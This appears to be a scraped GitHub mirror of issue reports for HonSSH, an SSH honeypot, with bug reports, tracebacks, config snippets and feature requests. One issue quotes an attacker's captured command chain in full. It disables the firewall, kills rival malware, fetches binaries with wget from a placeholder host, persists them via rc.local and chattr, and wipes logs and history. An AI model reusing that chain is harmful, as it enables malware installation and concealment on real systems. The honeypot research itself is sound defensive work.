                        fp = open(self.ttylog_file, 'rb')
                        logdata = MIMEBase('application', "octet-stream")
                        logdata.set_payload(fp.read())
                        fp.close()
                        Encoders.encode_base64(logdata)
                        logdata.add_header('Content-Disposition', 'attachment', filename=os.path.basename(self.ttylog_file))
                        msg.attach(logdata)
                        s = smtplib.SMTP(self.factory.server.cfg.get('mail', 'host'))
                        s.sendmail(msg['From'], msg['To'], msg.as_string())
                        s.quit()
                txtlog.log(self.txtlog_file, "Lost connection from: %s" % self.factory.server.endIP)
            else:
.....


[mail]
enable = true
host = localhost
from = honssh@honssh
to = [email protected]

Original issue reported on code.google.com by [email protected] on 1 Mar 2014 at 10:16

HonSSH feature request:input validation or verbose error messages to stdout

What steps will reproduce the problem?

1.
Enter an invalid in into honssh.cfg, "ssh_addr = 0.0.0."


2.
Execute honsshctrl.sh.

# ./honsshctrl.sh START
Starting honssh in background...
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] Starting factory 
<honssh.client.HonsshSlimClientFactory instance at 0x2f75ef0>
2014-05-04 16:01:35+0200 [-] Loaded.
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-04 16:01:35+0200 [-] reactor class: 
twisted.internet.pollreactor.PollReactor.
#

HonSSH appears to start and creates the honssh.pid file, but (for obvious 
reasons) you will not be able to stop it.

# ./honsshctrl.sh STOP
Attempting to stop HonSSH (1355)...
ERROR: Unable to stop HonSSH (1355)
#


3.
Checking the honssh.log i see this.

- Log error form malformed IP address "0.0.0.".
2014-05-04 16:01:36+0200 [-] twisted.internet.error.CannotListenError: Couldn't 
listen on 0.0.0.:22: [Errno -2] Name or service not known.

- Log error from an invalid port number "222222"
2014-05-04 16:04:41+0200 [-] OverflowError: getsockaddrarg: port must be 
0-65535.


What is the expected output?
Its easy enough to find the cause of the issue in the honssh.log,
but it would be nice to have these lines sent to stdout as well.

What version of the product are you using?
b13ef1d01b16

On what operating system?
Ubuntu server 12.04 LTS


Please provide any additional information below.
Havent used HonSSH for a while.
Awesome to see what you've accomplished over the last weeks :D


//Are

Original issue reported on code.google.com by [email protected] on 4 May 2014 at 2:13

Exception caught

What steps will reproduce the problem?
Not sure, during the lat 10 -11 days ive only seen this happen twice.


What is the expected output?
Normal log entries(?)


What do you see instead?
2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress] 
Unhandled Error
        Traceback (most recent call last):
          File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
            return callWithContext({"system": lp}, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
            return context.call({ILogContext: newCtx}, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
            return self.currentContext().callWithContext(ctx, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
            return func(*args,**kw)
        --- <exception caught here> ---
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 581, in _doReadOrWrite
            why = selectable.doRead()
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 199, in doRead
            rval = self.protocol.dataReceived(data)
          File "/usr/local/lib/python2.7/site-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
            self.dispatchMessage(messageNum, packet[1:])
          File "/HONEY/honssh/server.py", line 201, in dispatchMessage
            self.client.sendPacket(messageNum, payload)
        exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'

2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress] 
connection lost


What version of the product are you using?
b9880b4e367b    


On what operating system?
OpenBSD 5.4


Please provide any additional information below.
Totally forgot to enable advanced logging, doing that now and including it if 
it happens again :)

Original issue reported on code.google.com by [email protected] on 12 Mar 2014 at 6:48

connection closed immediately.

What steps will reproduce the problem?
hello,

I've been trying to set up honssh to work in a virtual(vmware) environment, 
unfortunately i'm unable to get a good config.



config info (relevant to my issue):

ssh_addr = 192.168.1.75 -- honssh is running here
ssh_port = 2222
client_addr = 192.168.1.1
honey_addr = 192.168.1.211 -- vulnerable machine is running here


What is the expected output? What do you see instead?
Testing to log into the honeypot, 
What i'm seeing is: 
root@internet# ssh 192.168.1.75 -p 2222
Connection closed by 192.168.1.75

What version of the product are you using? On what operating system?
OS latest Ubuntu distribution x32
I believe i'm using the latest version: "git clone 
https://code.google.com/p/honssh"


Please provide any additional information below.

i'll b ekeeping an eye on this thread if there is any info you'd like to know 
from me i'll try to answer as fast as possible.

Thanks,
  Dan.

Original issue reported on code.google.com by [email protected] on 16 Feb 2014 at 1:51

Feature request:

(Feature request by proxy :) ) 

If I may give a feature request for next version that would be:
- accept any user name (or with the same modulo system with chance =)
- if !root => create an account with the provided user name of the honeypot
- if root => give root access.

Original issue reported on code.google.com by [email protected] on 21 Oct 2014 at 3:48

Enhancment: Add country of origin to the mail templates

Hi Thomas,

This is only a suggestion for the mail templates thats being used by HonSSH.
It would be nice to get the country of origin added to the templates as well.

- The current output looks like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 - 
SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root

- My suggestion is changing it to something like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 - United States - 
SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root


Maybe it would be possible to add it using something similar to this?

import GeoIP

def cname(ipv4_str):
    """Checks the ipv4_str against the GeoIP database. Returns the full country name of origin if 
    the IPv4 address is found in the database. Returns None if not found."""
    geo = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
    country = geo.country_name_by_addr(ipv4_str)

    return country


//Are

Original issue reported on code.google.com by [email protected] on 9 Aug 2014 at 9:25

HonSSH ignores wget inside EXEC commands

What steps will reproduce the problem?
1. The attacker has found the login to the honeypot

2. The attacker executes a series of commands while logging in (i've seen more 
and more of this behavior lately), some of which includes a wget command(s), 
the files are not caught by HonSSH.


Example:

ssh -l root blacks.trollpot.biteme /etc/init.d/iptables stop\necho "nameserver 
8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" >> 
/etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9 
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir 
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9 
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9 
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall 
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9 
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9 
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9 
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9 
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /root; chmod 
7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall -9 joudckfr\nkillall -9 
www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 .Mm2\nkillall -9 
acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 QQ\nkillall -9 g3\nkillall 
-9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 qweasd\nkillall -9 
tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall -9 xudp\nkillall -9 
txma\nkillall -9 mrdos64.b00\nkillall -9 mrdos32.b00\nkillall -9 
kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 jibateng\ncd /root;rm -rf 
dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm -rf dir atddd\ncd /etc;rm 
-rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd /etc;rm -rf dir sksapdd\ncd 
/etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir xfsdxd\ncd /etc;rm -rf dir 
fake.cfg\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm 
-rf dir cupsddd.*\ncd /etc;rm -rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd 
/etc;rm -rf dir kysapdd.*\ncd /etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir 
skysapdd.*\ncd /etc;rm -rf dir xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm 
-rf dir atdd\ncd /etc;rm -rf dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm 
-rf dir sksapd\ncd /etc;rm -rf dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd 
/etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm -rf dir 
atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd /etc;rm -rf dir kysapd.*\ncd /etc;rm -rf 
dir sksapd.*\ncd /etc;rm -rf dir skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd 
/var/spool/cron; rm -rf dir root.*\ncd /var/spool/cron; rm -rf dir root\ncd 
/var/spool/cron/crontabs; rm -rf dir root.*\ncd /var/spool/cron/crontabs; rm 
-rf dir root\ncd /var/spool/cron ;wget http://sketchy.ip.address/root\ncd 
/var/spool/cron/crontabs ;wget http://sketchy.ip.address/root\ncd /etc;wget 
http://sketchy.ip.address/cupsdd\ncd /etc;wget 
http://sketchy.ip.address/ksapdd\ncd /etc;wget 
http://sketchy.ip.address/kysapdd\ncd /etc;wget 
http://sketchy.ip.address/atddd\ncd /etc;wget 
http://sketchy.ip.address/skysapdd\ncd /etc;wget 
http://sketchy.ip.address/sksapdd\ncd /etc;wget 
http://sketchy.ip.address/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777 
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777 
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup 
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup 
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup 
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup 
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho 
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local 
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >> 
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset 
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i 
cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i 
cupsdd\nrm -rf /root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd 
/var/log > dmesg \ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd 
/var/log > boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > 
cups \ncd /var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > 
faillog \ncd /var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog 
\ncd /var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > 
anaconda.log \ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > 
wtmp\ncd /var/log > utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd 
/var/log > sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root > 
.bash_history\nhistory -c\necho


What is the expected output?
There are a number of files being downloaded here 
(http://sketchy.ip.address/[filename])
that i would expect to be downloaded by HonSSH.

What do you see instead?
Only what is shown above.

What version of the product are you using? On what operating system?
b9880b4e367b

Please provide any additional information below.
Not sure if this is caused by running the commands at login, that there are 
multiple wget commands
or something else.

Original issue reported on code.google.com by [email protected] on 10 Mar 2014 at 10:29

Logrotate set permis to 0600 (?)

What steps will reproduce the problem?
1. The honssh.log reaches the point where it should be rotated and a new 
logfile created

2. When the old log files is moved to honssh.log.1 and a new honssh.log is 
created its permissions seems to be set to 0600

What is the expected output?
Expected log file permissions to be 0640 or 0644

What do you see instead?
Log file permissions are set to 0600


What version of the product are you using?
56dfab7e24f1

On what operating system?
OpenBSD 5.3/5.4

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 25 Mar 2014 at 9:12

Problem after HonSSH start

Hello all. Can you help me with this problem please?

What steps will reproduce the problem?
1. I have installed and configured HonSSH according instructions
2. I have ran start.sh 
3. After I saw this error (below) in honssh.log. And Honeypot does not record 
any activity after SSH login.

2014-03-11 23:38:34+0100 [-] Log opened.
2014-03-11 23:38:34+0100 [-] twistd 12.0.0 (/usr/bin/python 2.7.3) starting up.
2014-03-11 23:38:34+0100 [-] reactor class: 
twisted.internet.pollreactor.PollReactor.
2014-03-11 23:38:34+0100 [-] HonsshServerFactory starting on 22
2014-03-11 23:38:34+0100 [-] Starting factory 
<honssh.server.HonsshServerFactory instance at 0x7faaba27a5f0>
2014-03-11 23:38:34+0100 [-] Factory starting on 5123
2014-03-11 23:38:34+0100 [-] Starting factory 
<twisted.internet.protocol.Factory instance at 0x7faaba27d908>
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] 
SSH-2.0-OpenSSH_6.0p1 Debian-4
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Disconnecting with 
error, code 10 reason: user closed connection
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] connection lost
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Stopping factory 
<honssh.client.HonsshSlimClientFactory instance at 0x7faaba27a830>

Thank you for reply.

Original issue reported on code.google.com by [email protected] on 11 Mar 2014 at 11:11

Crash when unknown packet comes too early

When an unknown packet arrives before the client logged in, the current honssh 
crashes, because the session-log is not available:

2014-03-02 06:46:52+0100 [Uninitialized] New client connection
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] kex alg, key alg: 
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] outgoing: aes256-ctr 
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] incoming: aes256-ctr 
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] REVERSE
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] Client Connection 
Secured
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] kex alg, key 
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] outgoing: 
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] incoming: 
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] NEW KEYS
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER: 
MessageNum: 5 Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 6 
Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER: 
MessageNum: 50 Encrypted 
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x04none'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 51 
Encrypted '\x00\x00\x00\x12publickey,password\x00'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] SERVER: 
MessageNum: 50 Encrypted 
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x08password\x00\
x00\x00\x00\x06123456'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] Unhandled Error
        Traceback (most recent call last):
          File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
            return callWithContext({"system": lp}, func, *args, **kw)
          File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
            return context.call({ILogContext: newCtx}, func, *args, **kw)
          File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
            return self.currentContext().callWithContext(ctx, func, *args, **kw)
          File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
            return func(*args,**kw)
        --- <exception caught here> ---
          File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
            why = selectable.doRead()
          File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
            return self._dataReceived(data)
          File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
            rval = self.protocol.dataReceived(data)
          File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
            self.dispatchMessage(messageNum, packet[1:])
          File "/home/hooster/honssh/honssh/server.py", line 187, in dispatchMessage
            txtlog.log(self.txtlog_file, "Unknown SSH Packet detected - Please raise a HonSSH issue on google code with the details: %s - %s" % (str(messageNum), repr(payload)))
          File "/home/hooster/honssh/honssh/txtlog.py", line 40, in log
            f = file(logfile, 'a')
        exceptions.IOError: [Errno 2] No such file or directory: 'sessions/183.44.100.88/20140302_064652.log'

2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] connection lost

Original issue reported on code.google.com by [email protected] on 2 Mar 2014 at 11:02

HonSSH fingerprinting possibility?

What steps will reproduce the problem?
It looks like its possible to fingerprint HonSSH trough banner grabbing.


What is the expected output?
$ nc -v blacks.sshserver.com 22
Connection to blacks.sshserver.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3


What do you see instead?
$ nc -v blacks.trollpot.com 22
Connection to blacks.trollpot.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3
����;���������G@;�$��diffie-hellman-group1-sha1ssh-rsa�aes
256-ctr,aes256-cbc,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast1
28-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc�aes256-ctr,aes256-cbc,aes19
2-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast128-cbc,blowfish-ctr,blow
fish-cbc,3des-ctr,3des-cbc�hmac-sha1,hmac-md5�hmac-sha1,hmac-md5none,zlib   none,z
libA(&


What version of the product are you using?
b9880b4e367b


On what operating system?
All of them i guess?


Please provide any additional information below.
It looks to me that HonSSH is using the version string (ssh debig level 1)
as well as the kex_parse_kexinit (ssh debug level 2). Is it possible to
make HonSSH be less verbose/prevent it from dumping too much information?


Cheers,
B

Original issue reported on code.google.com by [email protected] on 16 Mar 2014 at 4:40

tnich / honssh Goto Github PK

honssh's People

Contributors

Stargazers

Watchers

Forkers

honssh's Issues

Recommend Projects

Recommend Topics

Recommend Org